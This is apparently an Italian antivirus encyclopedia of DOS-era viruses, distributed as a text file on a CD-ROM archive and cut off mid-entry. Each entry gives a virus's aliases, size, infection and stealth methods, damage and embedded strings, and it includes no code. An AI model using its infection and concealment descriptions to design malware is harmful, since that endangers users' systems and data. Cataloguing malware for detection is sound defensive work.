home *** CD-ROM | disk | FTP | other *** search
Wrap
Text File | 1998-09-24 | 1.0 MB | 31,211 lines
Text Truncated. Only the first 1MB is shown below. Download the file for the complete contents.
[(c)Brain] Nome del Virus: (c)Brain. Pseudonimo: Pakistani, Clone, Nipper. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Quando si esegue un file infetto, il virus si installa nella memoria. La memoria totale disponibile diminuisce di 3-7K Byte. Il virus rimuove i settori di boot e li sostituisce con una sua copia. I settori di boot originali verranno spostati in un altro settore e marcati come errati. Questo virus cambierα anche l'etichetta del disco con: "(c) Brain" Nel virus si trova il seguente testo: Welcome to the Dungeon (c) 1986 Basit & Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730 NIZAB BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE :430791,443248,280530. Beware of this VIRUS.... Contact us for vaccination................. $#@%$@!! [555] Nome del Virus: 555. Pseudonimo: Dutch 555, Quit-199. Tipo di Virus: Virus da file. Lunghezza del Virus: 555 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE, ed il file COMMAND.COM. Quando si esegue un file infetto, il virus si installa nella memoria. La memoria totale disponibile diminuisce di 560 Byte. Una volta che il virus Φ in memoria infetta i file con estensione *.COM ed *.EXE appena saranno eseguiti. I file infetti aumenteranno di 555 Byte di lunghezza, con il virus legato alla fine del file infetto. I file infetti avranno la data e l'ora di registrazione sostituiti con la data e l'ora in cui Φ avvenuta l'infezione. [AirCop] Nome del Virus: AirCop. Pseudonimo: Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Quando il sistema Φ avviato con un disco infettato dal virus, il virus si installa autonomamente in memoria. La memoria complessiva del sistema diminuisce di 1.024 Byte. Una volta che il virus Φ in memoria, infetta tutti i dischetti non protetti. Il virus sostituisce i settori di boot del floppy con una copia di se stesso. Nel sistema infetto il virus farα apparire il seguente messaggio: "Red State, Germ Offensive. AIRCOP." [Alameda] Nome del Virus: Alameda. Pseudonimo: Alemeda. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Quando un sistema Φ avviato da un disco infettato dal virus, il virus si installa in memoria. Una volta che il virus Φ in memoria, tutti i dischetti da 5-1/4" 360k saranno infettati quando il sistema Φ riavviato con un warm boot (CTRL-ALT-DEL). (Il virus rimane in memoria dopo un warm boot). [Ambulance] Nome del Virus: Ambulance. Pseudonimo: Ambulance Car, RedX. Tipo di Virus: Virus da file. Lunghezza del Virus: 796 Byte. Descrizione: Questo Φ un Virus che infetta i file con estensione *.COM. Quando viene eseguito un file infetto, il virus cercherα di infettare un file con estensione *.COM. Altri sintomi includono l'apparizione di un'ambulanza nella parte bassa dello schermo ed il suono di una sirena. [AntiEXE] Nome del Virus: AntiEXE. Pseudonimo: D3, NewBug, CMOS4. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Quando il sistema Φ avviato con un disco infettato dal virus, il virus si installa in memoria. Tutta la memoria disponibile diminuisce di 1.024 Byte. Inoltre il virus sovrascriverα il Master Boot Sector con una copia di se stesso. Una volta che il virus Φ in memoria, infetterα tutti i dischetti non protetti. [Atomic] Nome del Virus: Atomic. Pseudonimo: Tipo di Virus: Virus da file. Lunghezza del Virus: 371 Byte. Descrizione: Questo Φ un Virus che infetta i file con estensione *.COM. Quando si esegue un file infetto, il virus infetterα i primi due file con estensione *.COM sistemati nella stessa directory. Il virus sovrascriverα permanentemente i primi 371 Byte dei file che infetta. La data e l'ora dei file infetti non vengono cambiate. Il virus mostra il seguente messaggio dopo aver infettato un file: "Bad command or file name" Nel virus si trova la stringa: "[TAD1A] Memory Lapse -- Toronto, CANADA" "The Atomic Dustbin 1A -- This is just the first step" "Bad command or file name" "*.COM .. c Dustbin 1A -- This is just the first step" [Austr_Parasite] Nome del Virus: Austr_Parasite. Pseudonimo: Aussie Parasite. Tipo di Virus: Virus da file. Lunghezza del Virus: 292 Byte. Descrizione: Questo Φ un Virus che infetta i file con estensione *.COM ed il COMMAND.COM. Quando viene eseguito un file infetto, il virus si installa in memoria. La memoria totale disponibile diminuisce di 320 Byte. Una volta che il virus Φ in memoria, tutti i file con estensione *.COM saranno infettati. I file infetti aumenteranno di 292 Byte di lunghezza, con il virus sistemato alla fine del file infetto. La data e l'ora di registrazione dei file infettati non vengono cambiate. I sintomi includono il blocco del sistema. Nel virus si pu≥ trovare la stringa: "Australian Parasite" [Bljec] Nome del Virus: Bljec. Pseudonimo: Black Jec. Tipo di Virus: Virus da file. Lunghezza del Virus: 231-440 Byte. Descrizione: Questo Φ un Virus che infetta i file con estensione *.COM. Quando viene eseguito un file infetto, il virus infetta tre file con estensione *.COM presenti nella stessa directory. I file infetti aumenteranno di 231-440 Byte, con il virus posizionato all'inizio del file infetto. I file infetti avranno la data e l'ora di creazione sostituiti con la data e l'ora in cui Φ avvenuta l'infezione. I sintomi includono il blocco del sistema. [Butterfly] Nome del Virus: Butterfly. Pseudonimo: Butterflies. Tipo di Virus: Virus da file. Lunghezza del Virus: 302 Byte. Descrizione: Questo Φ un Virus che infetta i file con estensione *.COM. Quando viene eseguito un file infetto, il virus infetterα tutti i file con estensione *.COM che si trovano nella stessa directory. I file infetti aumenteranno di 302 Byte di lunghezza, con il virus sistemato alla fine del file infetto. I file infetti non avranno la data e l'ora di registrazione cambiata. Si ritrova nel virus il seguente testo: "Goddamn Butterflies" "*.COM" [Cascade] Nome del Virus: Cascade. Pseudonimo: Black Jack, Falling. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.701 o 1.704 Byte. Descrizione: Questo Φ un Virus che infetta i file con estensione *.COM. Quando si esegue un file infetto, il virus si installa nella memoria. Una volta che il virus Φ in memoria, determinerα la caduta dei caratteri sullo schermo nella parte bassa dello stesso. [Connie] Nome del Virus: Connie. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.761 Byte. Descrizione: Questo Φ un Virus che infetta i file con estensione *.COM, ed il file COMMAND.COM. Quando si esegue un file infetto, il virus si installa nella memoria. La memoria totale disponibile diminuisce di 3.520 Byte. Una volta che il virus Φ in memoria, infetterα i file con estensione *.COM quando verranno eseguiti, aperti o copiati. I file infetti aumenteranno di 1.761 Byte di lunghezza con il virus situato alla fine del file infetto. La data e l'ora di creazione dei file infetti non sono modificate. Nel virus si pu≥ trovare il seguente testo: "This is <Connie> Written by Dark Slayer in Keelung TAIWAN P:\COMMAND.COM" [CVirus] Nome del Virus: CVirus. Pseudonimo: Nowhere Man, VMessi. Tipo di Virus: Virus da file. Descrizione: Il virus infetta i file con estensione *.COM ed *.EXE pi∙ grandi di 6.300 Byte. Quando viene eseguito un file infetto, il virus cercherα un file adatto da infettare (che misuri pi∙ di 6.300 Byte). I file infetti avranno i primi 6.286 Byte originali sovrascritti dal virus. Data e ora di creazione dei file infetti non saranno alterati. Ogni volta che un file verrα infettato con successo comparirα sullo schermo la scritta: "Out of memoria" Se l'infezione non sarα possibile comparirα la scritta: "All files infected. Mission complete." Nel virus si pu≥ trovare il seguente testo: "NMAN" "BMAN" "*.EXE" [DataLock] Nome del Virus: DataLock. Pseudonimo: Datalock.920.A, V920. Tipo di Virus: Virus da file. Lunghezza del Virus: 920 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE. Vettore PC agganciato: INT 21h. Metodo di infezione: Quando Φ in esecuzione un file infetto, il virus si carica in memoria. Quando caricato, infetta ogni file eseguito. I file infetti aumentano di 920 Byte. Danni: Dopo agosto del 1990, il virus non permetterα di aprire i file con estensione *.?BF. Quando viene fatto un tentativo, esso fa comparire un falso messaggio d'errore "Too many files open." [Denzuko] Nome del Virus: Denzuko. Pseudonimo: Den Zuk. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Metodo di infezione: quando si prova ad avviare il sistema con un dischetto infetto, il virus si carica in memoria anche se l'avviamento fallisce. Quando caricato, il virus prova ad infettare ogni dischetto a cui si accede. Danni: Quando si premono i tasti <Ctrl><Alt><Del> compare il messaggio "Den Zuk" e il sistema sembra riavviarsi. Tuttavia, il virus rimane in memoria. Dato che il virus fu progettato per dischetti da 360 KB, esso distrugge involontariamente anche i dati sui dischetti da 3,5 pollici o 1,2 MB. [Die_Hard_2] Nome del Virus: Die_Hard_2. Pseudonimo: DH2. Tipo di Virus: Virus da file. Lunghezza del Virus: 4,000 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE. Vettore di Interrupt agganciato: INT 21h. Metodo di infezione: Quando viene eseguito un file infetto il virus si carica in memoria. Mentre si carica, infetta i file eseguibili a cui si accede. I file infetti aumentano di 4.000 Byte. Danni: In fase di verifica. [Dir] Nome del Virus: Dir. Pseudonimo: DIR. Tipo di Virus: Virus da file. Lunghezza del Virus: 691 Byte. Descrizione: Vedi Dir-2. [Dir-2] Nome del Virus: Dir-2. Pseudonimo: Dir-II, Creeping Death. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.024 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Quando il virus si carica in memoria cambia la struttura dei dati nella directory in modo che alcuni file siano a lui collegati. 2) Questo permette al virus di essere eseguito quando si esegue un file a cui Φ legato il virus DIR2-910. A questo punto pu≥ iniziare a infettare altri file. 3) Il virus Φ residente in memoria ma non determina nessun Interrupt. Esso utilizza un'altra funzione per infettare i file. Infetta i file con estensione *.COM ed *.EXE quando sono "READ & WRITE". Quando tutti i file di un disco con estensione *.COM ed *.EXE sono infetti, non sarα possibile eseguire nessun file dal disco. Metodo di rilevazione: Verifica il disco usando "CHKDSK.EXE"; se alcuni file hanno dei collegamenti incrociati nella stessa posizione, allora i file potrebbero essere infetti. Note: DIR2-910 non intercetta l'INT 24h quando infetta il file. Omette errori I/O (come per esempio protetto da scrittura). [Disk_Killer] Nome del Virus: Disk_Killer. Pseudonimo: Ogre. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Metodo di infezione: Quando il sistema Φ avviato da un disco infetto, il virus si carica in memoria. Danni: Dopo che il computer Φ rimasto acceso per 48 ore, il virus fa apparire il seguente messaggio e in seguito cripta tutti i dati presenti nell'hard disk: "Disk Killer -- Version 1.00 by COMPUTER OGRE 04/01/1989 Warning!! Don't turn off the power or remove the diskette while Disk Killer is Processing. Processing. Now you can turn off the power. I wish you luck." [EDV] Nome del Virus: EDV. Pseudonimo: Cursy. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Quando il sistema Φ avviato con un disco infetto, il virus si installa in memoria. Una volta che il virus Φ in memoria, infetta ogni floppy utilizzato. Elimina il settore di boot originale e lo sostituisce con una copia del virus. Una volta che ha infettato sei dischi, disabilita la tastiera e altera il contenuto di tutti i dischi del sistema. Completato il compito, apparirα sullo schermo il seguente messaggio: "That rings a bell, no? From Cursy" La seguente stringa pu≥ essere trovata nei settori di boot infetti: "MSDOS Vers. E.D.V." [Exebug] Nome del Virus: Exebug. Pseudonimo: Swiss Boot, CMOS killer. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Vettore PC agganciato: INT 13h. Metodo di infezione: Quando il sistema Φ avviato con un dischetto infetto, il virus si installa in memoria, all'inizio della memoria di sistema, ma restando nel limite di 640k in DOS, spostando il ritorno dell'Interrupt 12. La memoria totale del sistema e la memoria accessibile diminuiranno di 1.024 Byte. Il virus infetterα inoltre il settore principale di boot dell'hard disk. Danni: Alterazione del settore di boot principale; diminuzione della memoria totale del sistema e della memoria accessibile; impossibilitα di accedere a "C" dopo aver avviato con un dischetto. [Fat_Table] Nome del Virus: Fat_Table. Tipo di Virus: Virus da file. Lunghezza del Virus: 6.540 Byte. Descrizione: Questo virus infetta i file con estensione *.EXE. Quando viene eseguito un file infetto, il virus infetta un file con estensione *.EXE sistemato nella stessa directory. Il virus sovrascriverα i primi 6.540 Byte del file originale. Le informazioni sulla data e l'ora di creazione dei file infetti saranno sostituite con la data e l'ora in cui Φ avvenuta l'infezione. Nel virus si pu≥ trovare la stringa: "hitohana" "karu ba" "rb C:\ * .* FAT TABLE E" "8RROR" "EXE" "COM" [Filler.A] Nome del Virus: Filler.A. Pseudonimo: Filler. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Metodo di infezione: Quando il sistema Φ avviato da un floppy infetto, il virus si carica in memoria. Mentre si carica, infetta ogni disco non protetto a cui si accede. Il programma DOS CHKDSK mostrerα la "Total Byte Memory" diminuita di 8.192 Byte. Danni: In fase di verifica. [Flip] Nome del Virus: Flip. Tipo di Virus: Virus da boot. Lunghezza del Virus: 2.672 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE. Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus si diffonde tramite l'esecuzione di un programma infetto o avviando il sistema con un disco infetto. Vi sono diversi metodi di infezione. 1) Infezione di un sistema pulito con l'utilizzo di un programma infetto. Quando viene eseguito un programma infetto in un sistema pulito, il virus si copia nell'ultimo posto dell'ultimo cilindro, iniziando dal quintultimo settore arrivando fino all'ultimo e sostituisce il settore di boot del DOS all'offset 0x13h (Numero dei settori logici) con 6. Infine, il codice del virus viene scritto sulla partizione dei settori. 2) Diffusione dell'infezione attraverso un disco infetto. Se un PC Φ avviato con un disco infetto, si completa la diffusione dell'infezione. Il codice di boot, precedentemente sostituito dal virus nella ripartizione del disco, legge il codice principale del virus iniziando dal quintultimo settore fino all'ultimo e si carica come TSR nella RAM, occupando 3KB nella memoria alta del sistema. Non appena viene installato come TSR, il virus prende il controllo dell'Int 1Ch (Timer Interrupt) per verificare, con una frequenza di 18.2 cicli al secondo, se Φ caricato il COMMAND.COM del DOS. Se Φ presente il DOS, il virus ripristina il timer e prende controllo dell'Int 21h. Danni: Perdita di dati immagazzinati dal sesto all'ultimo settore del disco. Il virus inoltre aumenta la lunghezza dei file. Sintomi: Il virus fa comparire lo schermo rovesciato (ruotato di 180 gradi). Inoltre aumenta la lunghezza dei file di 2.153 Byte. Note: Il virus utilizza una particolare tecnica per evitare di essere riconosciuto dai programmi anti-virus. Quando modifica la partizione dei settori, che Φ contenuta nell'Int 01h, attiva un singolo codice dell'avvio originale del DOS contenuto nell'Int 13h. Quindi il virus si sposta all'apice dell'MCB (Memoria Control Block) e diminuisce la memoria accessibile dell'MCB di 2672 (A70h). Aggancia con lo stesso metodo l'Int 21h e l'INT 13h, quindi fa iniziare l'esecuzione del programma originale. [Form.A] Nome del Virus: Form.A. Pseudonimo: FORM, Form, Form 18, Generic. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Vettore PC agganciato: INT 13h, INT 09h. Metodo di infezione: Quando il sistema Φ avviato da un dischetto infetto, il virus infetta il settore di boot del DOS e si carica in memoria. Mentre si carica, infetta ogni disco non protetto a cui si accede. Il CHKDSK di DOS indica 653.312 Byte di memoria libera. Danni: Il giorno 18 di ogni mese, il virus fa emettere il rumore di un clic ogni volta che si preme un tasto. Il sistema pu≥ bloccarsi quando si verifica un errore di lettura e parte dell'originale settore di boot pu≥ essere sovrascritto, rendendo la partizione inavviabile. [Friday_13th] Nome del Virus: Friday_13th. Pseudonimo: Friday the 13th, Virus 1813, Israelian, Jerusalem. Tipo di Virus: Virus da file. Lunghezza del Virus: circa 1.813 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE. Vettore PC agganciato: Int 21. Procedura eseguita: 1) Il virus controlla che sia in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Il virus caricato in memoria infetta ogni disco non infetto che viene aperto. Danni: Nel 1987 il virus non crea danni. Continua solamente ad infettare altri file. Ogni venerd∞ 13, escluso il 1987, il virus cancella ogni programma eseguito. Tutti gli altri giorni, escluso il 1987; il virus si diffonde. Mezz'ora dopo circa che il virus si Φ installato in memoria, fa scorrere sullo schermo una piccola finestra formata da due linee con coordinate (5,5), (16,16) e diminuisce la velocitα del computer, innescando un loop che si ripete 12 volte al secondo. Metodo di rilevazione: Aumenta la lunghezza dei file di 1.813 Byte. Note: Si carica in memoria. Appare un messaggio d'errore in caso ci sia un errore di I/O(come per esempio protetto da scrittura). [Frodo.Frodo.A] Nome del Virus: Frodo.Frodo.A. Pseudonimo: 4096, IDF, 4096-1, Frodo, Frodo.Frodo.A, 100 Year. Tipo di Virus: Virus da file. Lunghezza del Virus: 4.096 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE. Vettore PC agganciato: INT 21h, INT 13h. Metodo di infezione: Quando viene eseguito un file infetto, il virus si installa in memoria. Mentre si carica, infetta tutti i file eseguibili. Il virus fa aumentare di lunghezza i file infetti di 4.096 Byte. Danni: Dopo il 21 settembre, il virus cerca di modificare il settore di boot mostrando la scritta "FRODO LIVES". Tuttavia il codice del virus Φ inesatto, cos∞ invece di modificare aree del sistema, lo blocca. Note: Mentre il virus Φ in memoria, aumenta la lunghezza i file infetti. [Generic_408] Nome del Virus: Generic_408. Pseudonimo: NYB, B1. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Metodo di infezione: Quando il sistema Φ avviato con un dischetto infetto, il virus infetta il Master Boot Record e si carica in memoria. Mentre viene caricato, infetta ogni disco non protetto a cui si accede. Danni: Nessuno conosciuto. [Generic_437] Nome del Virus: Generic_437. Pseudonimo: Boot-437. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Il virus infetta solamente gli hard disk quando si avvia con un disco infetto. Una volta che il virus ha infettato l'hard disk, saranno infettati tutti i floppy che saranno usati su quella macchina. Come molti altri virus del settore di boot (eccetto Form), Boot-437 infetta il settore di boot del DOS anzichΘ il Master Boot Record. [GreenCat] Nome del Virus: GreenCat. Pseudonimo: Green Caterpillar, Green_Caterpillar.1575.A, Find, 1591, 1575. Tipo di Virus: Virus da file. Lunghezza del Virus: Da 1.991 a 2.005 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE. Vettore PC agganciato: INT 21h. Metodo di infezione: Quando viene eseguito un file infetto, il virus si carica in memoria. Danni: Dopo che Φ trascorso un tempo prestabilito, l'esecuzione di un file infetto determina il passaggio di un "Caterpillar" verde sullo lo schermo, cancellando al suo passaggio i dati dallo schermo. Non c'Φ un danno permanente. [Grog31] Nome del Virus: Grog31. Pseudonimo: Grog 3.1. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.200 Byte. Descrizione: Questo Φ un Virus che infetta i file con estensione *.COM ed anche il file COMMAND.COM. Quando si esegue un file infetto, il virus si installa nella memoria. La memoria totale disponibile diminuisce di 4.800 Byte. Il virus infetta inoltre COMMAND.COM. Una volta che il virus Φ in memoria, infetta i file con estensione *.COM, eseguiti o aperti, pi∙ grandi di 2.000 Byte. I file infetti aumentano di 1.200 Byte di lughezza, con il virus localizzato all'inizio del file infetto. Le informazioni sulla data e l'ora dei file infetti non vengono alterate. Nel virus si pu≥ trovare la stringa: "GROG 4EVER!" "GROG v3.1 (C) '93 by GROG - Italy" "Microsoft C:\COMMAND.COM" [Hacktic2] Nome del Virus: Hacktic2. Tipo di Virus: Virus da file. Lunghezza del Virus: 83 Byte. Descrizione: Il virus infetta i file con estensione *.COM e *.EXE, incluso il COMMAND:COM. Quando viene eseguito un file infetto, il virus infetta un file nella directory in uso, accorciando la lunghezza del file di 83 cos∞ come cambia l'attributo del file in "hidden". Le informazioni sulla data e l'ora dei file infetti sono cambiate con quelle dell'infezione. [Hobbit] Nome del Virus: Hobbit. Tipo di Virus: Virus da file. Lunghezza del Virus: 505 Byte. Descrizione: Questo virus infetta i file con estensione *.EXE. Quando si esegue un file infetto, il virus si installa nella memoria. La memoria totale disponibile decrementa di 1.440 Byte. Una volta che il virus Φ in memoria, infetta i file con estensione *.EXE quando vengono eseguiti o aperti. Il virus sovrascrive i primi 505 Byte del file. Le informazioni sulla data e l'ora dei file infetti non viene alterata. Nel virus si pu≥ trovare la stringa: "HOBIT" [Jerusalem] Nome del Virus: Jerusalem. Pseudonimo: Israeli, Jerusalem.1808.Standard, 1808, Israeli, 1813 Jeru-3-3, Jerusalem.1808.Critical. Tipo di Virus: Virus da file. Lunghezza del Virus:Da 1.808 a 1.822 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE. Vettore PC agganciato: INT 21h, INT 08h. Metodo di infezione: Quando viene eseguito un file infetto, il virus si carica in memoria. Mentre caricato, infetta ogni file eseguito, eccetto il file COMMAND.COM. Il virus fa aumentare la lunghezza dei file con estensione *.EXE di 1.808-1.822 Byte nella prima infezione e di 1.808 Byte nelle successive. I file infetti con estensione *.COM aumentano di 1.813 Byte. Danni: Venerd∞ 13, dopo che il virus Φ presente da trenta minuti, cancella tutti i file eseguiti. Un altro giorno, il virus anticipa l'ora di sistema di 30 minuti, dopo ogni infezione. Esso inoltre cancella una porzione dello schermo, sulla quale non appare niente. Un bug nel virus fa in modo che i file con estensione *.EXE siano infettati ripetutamente finchΦ diventano troppo grandi per essere eseguiti. [Joshi] Nome del Virus: Joshi. Pseudonimo: Happy Birthday Joshi. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Metodo di rilevazione: Il primo virus "Jhoshi" fu scoperto in India nel 1990. E' un virus molto popolare in India: Il virus rimane nel settore di boot o nell'area FAT. Ogni 5 Gennaio, il virus fa comparire: "Type Happy Birthday Joshi". Non vi sono conseguenze se l'utente sovrascrive il messaggio. La memoria del sistema diminuisce di 6KB quando Φ presente il virus. Note: Si carica in memoria. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Jumper] Nome del Virus: Jumper. Pseudonimo: 2kb. Tipo di Virus: Virus da file. Lunghezza del Virus: 2.048 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM ed *.EXE ed il COMMAND.COM. Quando un file infetto viene eseguito per la prima volta in un sistema pulito, il virus si carica in memoria. La memoria totale diminuisce di 8.336 Byte. Una volta che il virus Φ in memoria, infetta i file con estensione *.EXE e *.COM appena vengono eseguiti. I file infetti hanno la lunghezza del file aumentata di 2.048 Byte. Data ed ora dei file infetti non sono cambiate. La seguente stringa Φ presente nei programmi infetti: "BIOS" [Junkie.A-1] Nome del Virus: Junkie.A-1. Pseudonimo: Junkie. Tipo di Virus: Virus da file. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE. Vettore PC agganciato: INT 1Ch, INT 21h. Metodo di infezione: La prima volta che un file infetto Φ in esecuzione, il virus sovrascrive il Master Boot Record. Quando il sistema Φ avviato nuovamente (o quando Φ avviato con un dischetto infetto), il virus si carica in memoria. Mentre caricato, il virus infetta ogni file con estensione *.COM eseguito e ogni disco a cui si accede. Il programma DOS CHKDSK mostra la "total Byte memoria" diminuita di 3.072 Byte. I file infetti aumentano di almeno 1.000 Byte. Danni: Nessuno conosciuto. [K_Hate] Nome del Virus: K_Hate. Pseudonimo: K-Hate. Tipo di Virus: Virus da file. Lunghezza del Virus: Da 1.237 a 1.304 Byte. Descrizione: Questo Φ un Virus che infetta i file con estensione *.COM ed il COMMAND.COM. Quando viene eseguito un file infetto, il virus infetta tutti i file con estensione *.COM sistemati nella stessa directory. I file infetti aumentano di 1.237 Byte fino a 1.304 con il virus localizzato alla fine del file. Le informazioni riguardanti data ed ora dei file infetti non saranno cambiate. Nel virus si pu≥ trovare la stringa: "CRYPT INFO" "KDG 0,5 / Khntark3" "*, K-HATE / Khntark*.COM" [Kampana.A] Nome del Virus: Kampana.A. Pseudonimo: Telecom Boot, Campa, Anti-Tel, Brasil. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo Virus infetta il settore di boot. Vettore PC agganciato: INT 13h. Metodo di infezione: Quando il sistema Φ avviato da un disco infetto, il virus si carica in memoria. Mentre caricato, infetta ogni disco a cui si accede. Il programma DOS CHKDSK mostrerα la "Total Byte Memory" diminuita di 1.024 Byte. Danni: Dopo un certo numero di avvii, il virus sovrascrive i settori dell'hard disk. Note: Se si cerca di esaminare il Master Boot Record mentre il virus viene caricato, mostra la versione originale non infetta. [KeyKapture] Nome del Virus: KeyKapture. Pseudonimo: KeyKap, Hellspawn.1. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.074 Byte. Descrizione: Infetta i file con estensione *.EXE creando un file con estensione *.COM nascosto, con lo stesso nome nella stessa directory. Quando si esegue un file infetto, il virus si installa nella memoria. La memoria totale disponibile diminuisce di 3.072 Byte. Una volta che il virus Φ in memoria, infetta i file con estensione *.EXE eseguiti, creando un file di 1.024 Byte con estensione *.COM con lo stesso nome. Il file con estensione *.EXE originale non viene cambiato. Un sistema infetto pu≥ bloccarsi. Nel virus si pu≥ trovare la stringa: "KKV.90 KeyKapture Virus v0.90 [Hellspawn-II] (c) 1994 by Stormbringer [PS]" [MacGyver] Nome del Virus: MacGyver. Tipo di Virus: Virus da file. Lunghezza del Virus: 2.824 Byt.e Descrizione: Questo virus infetta i file con estensione *.EXE. Metodo di infezione: Quando viene eseguito un programma infetto, il virus MacGyver si installa in memoria come TSR di 3.072 Byte. Quando il virus MacGyver Φ in memoria, infetta i programmi con estensione *.EXE eseguiti o aperti. La seguente stringa Φ visibile senza che il codice virale del MacGyver sia in tutti i programmi: "SCANVIR.SHW" Danni: Pu≥ causare frequenti blocchi del sistema quando vengono eseguiti i programmi con estensione *.EXE. Il programma DOS CHKDSK indica gli errori di allocazione dei file in tutti i file infetti quando il virus Φ presente in memoria. [Metal_Militia] Nome del Virus: Metal_Militia. Pseudonimo: MMIR, Immortal Riot. Tipo di Virus: Virus da file. Lunghezza del Virus: 282 Byte. Descrizione: Questo virus infetta i file con estensione *.COM, ed il file COMMAND.COM. Quando si esegue un file infetto, il virus si installa nella memoria. La memoria totale disponibile diminuisce di 3.072 Byte. Una volta che il virus Φ in memoria, infetta i file con estensione *.COM eseguiti. I file infetti aumentano di 1.054-5 Byte di lunghezza, con il virus localizzato all'inizio del file infetto. Le informazioni riguardo data ed ora dei file infetti non saranno cambiate. Nel virus si pu≥ trovare la stringa: "Senseless Destruction..." "Protecting what we are joining together to take on the world.." "METAL MiLiTiA [iMMORTAL RIOT] SVW" [Michelangelo] Nome del Virus: Michelangelo. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta il settore di boot dei dischi. Quando il sistema Φ avviato da un disco infetto, il virus si installa in memoria. La memoria utilizzabile diminuisce di 2.048 Byte. Una volta che il virus Φ in memoria, infetta il settore di boot dei dischi a cui si accede. Il virus rimuove il settore di boot originale e lo sostituisce con una copia di se stesso. Questo virus si attiva il giorno 6 Marzo. Formatta l'hard disk, sovrascrivendo tutti i dati presenti. [Monkey] Nome del Virus: Monkey. Pseudonimo: Stoned.Empire.Monkey.B, Monkey 2. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta il settore di boot. Metodo di infezione: Quando il sistema viene avviato da un dischetto infetto, il virus si carica in memoria. Mentre caricato, infetta ogni dischetto non protetto a cui si accede. Il programma DOS CHKDSK mostra la "total Byte memoria" diminuita di 1.024 Byte. Monkey-1 Φ uno dei pochi virus che pu≥ infettare con successo i floppy mentre Φ in esecuzione Microsoft Windows. Danni: Il virus cripta la tabella delle partizioni del Master Boot Record. Se si cerca di avviare da un floppy pulito, il disco risulta inaccessibile in quanto la partizione table Φ stata rimossa. Note: Se si cerca di esaminare il Master Boot Record mentre il virus Φ in memoria, compare la versione originale non infetta . Attenzione: Non usare FDISK /MBR per pulire questo virus. [Mummy] Nome del Virus: Mummy. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.300 - 1.503 Byte. Descrizione: Questo virus infetta i file con estensione *.EXE. Procedura eseguita: 1) Il virus verifica che sia in memoria. Se "No", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Il virus in memoria infetta quindi ogni file non infetto eseguito. Danni: Questo virus possiede diverse varianti. Mentre alcune di queste non creano danni, altre diminuiscono le prestazioni del sistema ed alcune varianti di Mummy hanno un contatore numerico con impostazioni casuali. Quando il contatore arriva a zero, il virus sovrascrive la prima parte dell'hard disk e causa un'ingente perdita di dati. Metodo di rilevazione: Fa aumentare la lunghezza dei file di 1.300-1.503 Byte. Il virus, quando Φ in memoria, blocca occasionalmente il sistema. Nel codice del virus Φ presente la stringa di testo criptata: "Mummy Version x.xxx", "Kaohsiung Senior School", "Tzeng Jau Ming presents", "Series Number=[xxxxx]." Note: Si carica in memoria. Appare un messaggio d'errore in caso ci sia un errore di I/O(come per esempio protetto da scrittura). [Natas] Nome del Virus: Natas. Pseudonimo: Satan, Sat_Bug.Natas, Natas-4, Natas-6. Tipo di Virus: Virus da file. Lunghezza del Virus: 4.746 Byte. Descrizione: Questo Virus infetta i file con estensione *.COM e *.EXE. Vettore PC agganciato: INT 13h, INT 21h. Metodo di infezione: Quando il sistema Φ avviato da un disco infetto, il virus si carica in memoria ed infetta il Master Boot Record. Mentre caricato, infetta ogni file o dischetto che viene aperto. La memoria totale del sistema diminuisce di 5.664 Byte. I file infetti aumentano di 4.744 Byte. Danni: Il virus formatta l'hard disk e distrugge i dati contenuti nei dischetti. [No_of_Beast] Nome del Virus: No_of_Beast. Pseudonimo: No. of the Beast. Number_of_the_Beast.E, DARTH, 666, 512. Tipo di Virus: Virus da file. Lunghezza del Virus: 512 Byte. Descrizione: Questo virus infetta i file con 